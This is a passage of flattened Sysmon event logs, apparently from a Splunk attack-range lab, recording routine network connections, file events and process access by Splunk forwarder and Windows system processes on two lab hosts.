Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C059327F5B769D6D955A6C4D570AB452,SHA256=515E710E499737AC42BE964853CB35CBD2E814AB9CFBA8E6B9936E7C5E717A5E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044471Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:41.617{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52363-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000205604Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:43.828{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56395-false10.0.1.12-8000- 23542300x8000000000000000205603Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:46.085{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6B698CEED1C886DA4D77CF2D5895DE2,SHA256=8C58631D8E6EC784A791119AC478E14C4C46B51ADF3F10042958327484ECEAA6,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044474Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:43.762{0A5DF930-E35C-6299-1000-000000006002}932C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse46.243.179.10146.243.179.101.leadertelecom.ru5967-false10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000205606Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:47.550{2E1864BB-E1BD-6299-A700-000000005F02}4700NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=5A72FA276A53AE9B2CFCC7A341DAF7EF,SHA256=C2A65336938C3A5DC3135C57ABE63F51B517169CC85568454EF4590B733A17D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205605Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:47.219{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CD21BE3D8EA8A906946A1A7B06861D0,SHA256=F50C142DFF5A7C26549A7473F9808A9427620BA1410C1866D61A2A99C9EF7435,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044488Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:47.827{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-1883-629A-2207-000000006002}212C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044487Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:47.827{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044486Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:47.827{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044485Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:47.827{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044484Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:47.827{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044483Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:47.827{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044482Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:47.827{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044481Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:47.827{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044480Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:47.827{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044479Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:47.827{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044478Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:47.827{0A5DF930-E35B-6299-0500-000000006002}412948C:\Windows\system32\csrss.exe{0A5DF930-1883-629A-2207-000000006002}212C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044477Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:47.827{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-1883-629A-2207-000000006002}212C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044476Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:47.827{0A5DF930-1883-629A-2207-000000006002}212C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044475Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:47.030{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73705C1AAC7FE155970087EDA45CF332,SHA256=7B0F03BCE8560E9DBFD26F7B7382A06FB05B1E377FC2D5E2B25AF56564BB6EE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205607Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:48.220{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F42A0216F39D6BFC72AB2752D924D653,SHA256=E1B64DBB1B9FBE481D697CD5E37136FDB64DD507F7DE3B0016173F6C0DEDFE1E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044503Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:48.530{0A5DF930-1884-629A-2307-000000006002}35364088C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044502Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:48.373{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-1884-629A-2307-000000006002}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044501Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:48.373{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044500Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:48.373{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044499Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:48.373{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044498Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:48.373{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044497Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:48.373{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044496Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:48.373{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044495Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:48.373{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044494Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 